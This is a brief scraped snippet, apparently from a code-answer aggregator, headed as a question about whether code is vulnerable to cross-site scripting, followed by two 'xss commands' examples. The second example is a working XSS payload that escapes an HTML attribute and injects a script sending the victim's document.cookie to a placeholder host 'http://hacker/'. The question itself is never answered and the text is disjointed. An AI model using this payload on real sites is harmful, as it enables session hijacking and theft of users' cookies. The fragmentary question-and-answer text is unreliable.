Is the following code vulnerable to Cross-Site Scripting? code example
Example 1: xss commands
<title>Example document: XSS Doc</title>
Example 2: xss commands
"><SCRIPT>var+img=new+Image();img.src="http://hacker/"%20+%20document.cookie;</SCRIPT>